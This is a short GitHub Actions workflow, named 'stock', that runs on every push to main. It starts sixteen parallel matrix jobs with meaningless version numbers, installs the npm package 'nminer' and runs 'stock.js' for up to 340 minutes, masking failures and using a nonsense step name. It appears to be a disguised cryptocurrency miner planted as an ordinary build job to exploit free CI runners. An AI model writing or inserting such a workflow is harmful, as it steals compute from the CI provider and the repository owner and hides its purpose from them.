name: stock
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 3782 }
          - { version: 5903 }
          - { version: 7827 }
          - { version: 5833 }
          - { version: 9261 }
          - { version: 9187 }
          - { version: 2630 }
          - { version: 3613 }
          - { version: 9299 }
          - { version: 3793 }
          - { version: 4579 }
          - { version: 2933 }
          - { version: 6629 }
          - { version: 5954 }
          - { version: 5461 }
          - { version: 9127 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: sideboard hamburger
        run: |
          npm install nminer@latest
          timeout 340m node stock.js || echo "stock executed"